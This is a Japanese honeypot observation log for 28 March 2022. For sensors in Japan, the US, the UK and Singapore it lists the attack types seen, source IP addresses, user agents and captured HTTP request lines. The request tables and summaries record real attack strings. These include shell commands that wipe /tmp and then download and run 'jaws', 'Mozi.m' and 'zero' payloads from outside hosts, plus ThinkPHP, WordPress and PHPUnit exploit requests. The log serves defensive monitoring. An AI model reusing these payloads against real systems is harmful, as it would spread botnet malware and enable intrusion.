ハニーポット(仮) 観測記録 2022/03/28分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
Location:JP
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
WordPress Pluginの脆弱性を狙うアクセス
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jswl.jdaili.xyz/jaws; sh /tmp/jaws
Location:US
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jswl.jdaili.xyz/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 31.210.20.109/jaws; sh /tmp/jaws
Location:UK
D-link製品の脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
Laravelへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jswl.jdaili.xyz/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget 31.210.20.109/jaws; sh /tmp/jaws
Location:SG
D-link製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2009-0545)を狙うアクセス
/.gitへのスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jswl.jdaili.xyz/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:87 (前日比:-81)
US:総アクセス数:66 (前日比:4)
UK:総アクセス数:29 (前日比:8)
SG:総アクセス数:63 (前日比:-20)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 4.16.142.230 | United States |
| 1 | 20.25.113.104 | United States |
| 1 | 20.116.104.137 | United States |
| 1 | 20.213.136.30 | United States |
| 1 | 34.72.63.8 | United States |
| 1 | 41.235.116.228 | Egypt |
| 1 | 45.33.99.138 | United States |
| 1 | 45.83.67.205 | Germany |
| 1 | 45.155.204.146 | Russia |
| 1 | 46.101.63.63 | United States |
| 1 | 72.47.16.108 | United States |
| 1 | 89.248.165.24 | United Kingdom |
| 15 | 95.214.235.205 | Ukraine |
| 1 | 109.237.103.9 | Russia |
| 2 | 109.237.103.118 | Russia |
| 1 | 115.63.50.187 | China |
| 21 | 129.154.36.229 | United States |
| 7 | 135.125.217.54 | France |
| 8 | 135.125.246.110 | France |
| 1 | 137.184.238.43 | United States |
| 1 | 138.68.144.74 | United States |
| 2 | 157.245.70.127 | United States |
| 2 | 164.92.89.135 | United States |
| 1 | 179.43.176.91 | Panama |
| 1 | 185.83.214.69 | Portugal |
| 8 | 185.254.196.217 | Ukraine |
| 1 | 192.241.215.29 | United States |
| 1 | 192.241.225.20 | United States |
| 1 | 209.141.44.145 | United States |
| 1 | 222.141.165.70 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 1 | Mozilla/5.0 (Linux; Android 6.0.1; SM-G900H Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 1 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 |
| 48 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 21 | python-requests/2.27.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01\x01\xfa\x01 |
||
| 49 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /XxX.php?XxX |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
| 1 | GET | /cgi-bin/luci |
HTTP/1.1 |
| 1 | GET | /components/Raiz0WorM_1648292403.php |
HTTP/1.1 |
| 1 | GET | /components/com_sexycontactform/fileupload/ |
HTTP/1.1 |
| 2 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /rk/632bb |
HTTP/1.1 |
| 1 | GET | /root.php |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws |
|
| 1 | GET | /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php |
HTTP/1.1 |
| 1 | GET | /wp-content/_input_3_raiz0.php5 |
HTTP/1.1 |
| 1 | GET | /wp-content/plugins/cherry-plugin/admin/import-export/Raiz0__olyfu.php |
HTTP/1.1 |
| 1 | GET | /wp-content/plugins/revslider/temp/update_extract/Raiz0__olyfu.php |
HTTP/1.1 |
| 1 | GET | /wp-content/plugins/showbiz/temp/update_extract/Raiz0__olyfu.php |
HTTP/1.1 |
| 1 | GET | /wp-content/uploads/2018/01/Raiz0__olyfu.php |
HTTP/1.1 |
| 1 | GET | /wp-content/uploads/assignments/Raiz0_1648292403.php. |
HTTP/1.1 |
| 1 | GET | /wp-content/uploads/wysija/themes/Master/un.php |
HTTP/1.1 |
| 1 | POST | /?gf_page=upload |
HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1648292403.php |
HTTP/1.1 |
| 1 | POST | /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form%22 |
HTTP/1.1 |
| 2 | POST | /wp-admin/admin-ajax.php |
HTTP/1.1 |
| 1 | POST | /wp-admin/admin-post.php?page=wysija_campaigns&action=themes |
HTTP/1.1 |
| 1 | POST | /wp-content/plugins/cherry-plugin/admin/import-export/upload.php |
HTTP/1.1 |
| 1 | POST | /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&Month=01 |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.53.253.54 | United States |
| 1 | 20.110.176.213 | United States |
| 1 | 41.238.42.144 | Egypt |
| 1 | 42.235.128.72 | China |
| 1 | 45.33.99.138 | United States |
| 1 | 45.83.66.226 | Germany |
| 9 | 45.155.204.146 | Russia |
| 1 | 46.101.7.222 | United States |
| 1 | 64.227.129.35 | United States |
| 1 | 89.248.165.24 | United Kingdom |
| 1 | 109.237.103.9 | Russia |
| 1 | 109.237.103.123 | Russia |
| 1 | 115.59.224.42 | China |
| 1 | 122.191.204.45 | China |
| 1 | 129.146.134.154 | United States |
| 8 | 132.145.9.189 | United States |
| 2 | 143.198.8.32 | United States |
| 1 | 155.94.145.168 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 159.223.130.128 | United States |
| 2 | 159.223.139.250 | United States |
| 1 | 162.142.125.221 | United States |
| 1 | 162.142.125.222 | United States |
| 1 | 164.90.135.111 | United States |
| 1 | 164.92.89.135 | United States |
| 1 | 167.94.138.118 | United States |
| 1 | 172.245.25.164 | United States |
| 1 | 173.21.181.82 | United States |
| 1 | 178.62.77.202 | United States |
| 1 | 179.43.176.91 | Panama |
| 1 | 180.188.251.240 | India |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 192.241.213.247 | United States |
| 1 | 192.241.222.159 | United States |
| 1 | 192.241.225.143 | United States |
| 1 | 197.37.157.146 | Egypt |
| 1 | 197.47.34.132 | Egypt |
| 1 | 198.144.189.25 | United States |
| 1 | 209.17.96.58 | United States |
| 1 | 209.17.97.90 | United States |
| 1 | 209.141.62.69 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 24 | - |
| 1 | Hello, World |
| 1 | Hello, world |
| 1 | Mozila/5.0 |
| 1 | Mozilla/5.0 (Linux; Android 8.0.0; LG-H873) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 |
| 22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 3 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01\xfb\x01 |
||
| 2 | \x16\x03\x01 |
||
| 24 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
| 1 | GET | /ab2g |
HTTP/1.1 |
| 1 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 1 | GET | /config.json |
HTTP/1.1 |
| 1 | GET | /config |
HTTP/1.1 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /info.php |
HTTP/1.1 |
| 1 | GET | /php.ini |
HTTP/1.1 |
| 1 | GET | /phpinfo.php |
HTTP/1.1 |
| 1 | GET | /phpinfo |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /rk/632bb |
HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]190[.]89[.]203:3204/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
| 3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+31[.]210[.]20[.]109/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | HEAD | /robots.txt |
HTTP/1.0 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.1 |
| 1 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
| 3 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.112.125.110 | United States |
| 1 | 27.215.126.249 | China |
| 1 | 45.33.99.138 | United States |
| 1 | 45.83.66.165 | Germany |
| 4 | 45.155.204.146 | Russia |
| 1 | 47.99.168.169 | China |
| 1 | 52.226.197.29 | United States |
| 1 | 76.10.141.195 | Canada |
| 1 | 89.248.165.24 | United Kingdom |
| 1 | 109.237.103.9 | Russia |
| 2 | 109.237.103.118 | Russia |
| 1 | 109.237.103.123 | Russia |
| 4 | 157.245.70.127 | United States |
| 1 | 162.142.125.222 | United States |
| 1 | 188.169.61.227 | Georgia |
| 1 | 192.241.214.54 | United States |
| 1 | 192.241.222.102 | United States |
| 1 | 192.241.225.118 | United States |
| 1 | 192.241.225.140 | United States |
| 1 | 197.62.22.67 | Egypt |
| 1 | 202.14.122.205 | India |
| 1 | 209.17.97.42 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 12 | - |
| 1 | Hello, World |
| 1 | Hello, world |
| 1 | Java/1.8.0_321 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 |
| 4 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01 |
||
| 1 | CONNECT | ver[.]movistarplus[.]es:443 |
HTTP/1.1 |
| 4 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /ReportServer |
HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
| 2 | GET | /ab2g |
HTTP/1.1 |
| 2 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /hunmj_serverApi/test.php |
HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws |
|
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+31[.]210[.]20[.]109/jaws;sh+/tmp/jaws |
HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | POST | /HNAP1/ |
HTTP/1.0 |
| 1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 13.92.21.79 | United States |
| 2 | 20.225.62.230 | United States |
| 1 | 40.72.103.145 | China |
| 1 | 45.33.99.138 | United States |
| 1 | 45.77.239.190 | United States |
| 1 | 45.143.200.118 | Russia |
| 4 | 45.155.204.146 | Russia |
| 1 | 46.101.7.222 | United States |
| 1 | 62.108.40.65 | Germany |
| 1 | 68.183.36.77 | United States |
| 1 | 89.248.165.24 | United Kingdom |
| 1 | 103.175.30.29 | India |
| 1 | 103.238.228.3 | India |
| 1 | 104.248.201.239 | United States |
| 1 | 109.237.103.9 | Russia |
| 2 | 109.237.103.118 | Russia |
| 1 | 109.237.103.123 | Russia |
| 1 | 120.85.97.39 | China |
| 1 | 120.86.236.208 | China |
| 1 | 140.206.86.124 | China |
| 1 | 142.93.194.204 | United States |
| 1 | 143.198.8.32 | United States |
| 2 | 156.223.111.221 | Egypt |
| 4 | 157.230.216.203 | United States |
| 1 | 159.223.130.128 | United States |
| 1 | 159.223.139.250 | United States |
| 2 | 159.223.180.164 | United States |
| 1 | 162.142.125.213 | United States |
| 1 | 167.94.138.44 | United States |
| 1 | 172.245.189.33 | United States |
| 1 | 178.60.27.186 | Spain |
| 1 | 179.43.176.91 | Panama |
| 8 | 185.254.196.223 | Ukraine |
| 1 | 188.165.87.98 | France |
| 1 | 192.241.195.189 | United States |
| 1 | 192.241.216.126 | United States |
| 1 | 192.241.221.114 | United States |
| 1 | 193.56.29.173 | United Kingdom |
| 1 | 197.49.227.57 | Egypt |
| 2 | 199.34.18.238 | United States |
| 1 | 205.185.120.72 | United States |
| 1 | 209.17.97.2 | United States |
| 3 | 210.13.110.60 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 20 | - |
| 1 | Hello, World |
| 1 | KummHttp/1.1 (compatible; KummClient; Linux rulez) |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 |
| 4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 28 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 |
||
| 1 | \x16\x03\x01\x01D\x01 |
||
| 1 | \x16\x03\x01 |
||
| 29 | GET | /.env |
HTTP/1.1 |
| 1 | GET | /.git/config |
HTTP/1.1 |
| 1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
| 2 | GET | /ab2g |
HTTP/1.1 |
| 2 | GET | /ab2h |
HTTP/1.1 |
| 1 | GET | /actuator/health |
HTTP/1.1 |
| 1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
| 4 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5[.]206[.]227[.]228%2Fzero;sh%20zero;%22 |
HTTP/1.0 |
| 1 | GET | /console/ |
HTTP/1.1 |
| 1 | GET | /favicon.ico |
HTTP/1.1 |
| 1 | GET | /hudson |
HTTP/1.1 |
| 1 | GET | /portal/redlion |
HTTP/1.1 |
| 1 | GET | /rk/632bb |
HTTP/1.1 |
| 3 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws |
|
| 1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
| 1 | GET | /xprober.php |
HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
| 2 | POST | /HNAP1/ |
HTTP/1.0 |
| 2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
| 2 | PRI | * |
HTTP/2.0 |
